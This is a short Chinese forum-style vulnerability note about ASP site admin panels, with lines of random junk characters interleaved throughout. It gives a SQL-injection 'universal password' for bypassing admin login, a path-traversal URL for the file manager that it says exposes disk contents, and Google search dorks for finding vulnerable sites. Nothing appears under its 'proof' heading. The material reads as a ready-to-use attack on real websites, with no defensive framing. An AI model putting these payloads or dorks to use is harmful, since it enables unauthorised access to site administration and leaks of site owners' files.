后台万能密码 'or'='or'
9 ]7 R- c8 x, c5 |- P1 E- C
9 o7 C5 l" v, _# S( B# B后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
8 ?% n' y. o! ]# ?0 r- Wadmin/uploadfile.asp?currentFolder=/upfiles/../
' o) ]5 R3 G! t2 u' e
' `/ b* J9 M1 g$ W! _7 x$ S; l) h漏洞证明:
2 |1 @! f; J5 L: M9 [. F0 l
8 f8 T) ^, d! W4 z; W+ O% |# ^; h谷歌:inurl:type.asp?id=1 新闻中心
7 m* }: C) Z; Y( |* J8 c; w+ Y或者 :inurl:download_ok.asp?
# K1 h0 D! T, T9 g# ?" ^9 b+ E$ U9 O: H
|